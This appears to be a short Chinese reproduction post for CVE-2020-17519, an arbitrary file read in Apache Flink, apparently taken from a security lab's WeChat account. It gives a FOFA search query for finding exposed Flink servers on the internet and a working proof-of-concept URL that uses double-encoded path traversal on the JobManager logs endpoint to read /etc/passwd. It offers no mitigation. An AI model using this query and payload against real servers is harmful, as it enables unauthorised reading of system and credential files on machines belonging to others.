漏洞环境
FOFA搜app="Apache-Flink"
漏洞危害
通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件
影响范围
Apache Flink 1.5.1 - 1.11.2
漏洞复现
首先通过FOFA搜集目标网站
构造poc 读取etc/passwd
http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
原文始发于微信公众号(赛瑞攻防实验室):CVE-2020-17519 Apache Flink任意文件读取漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论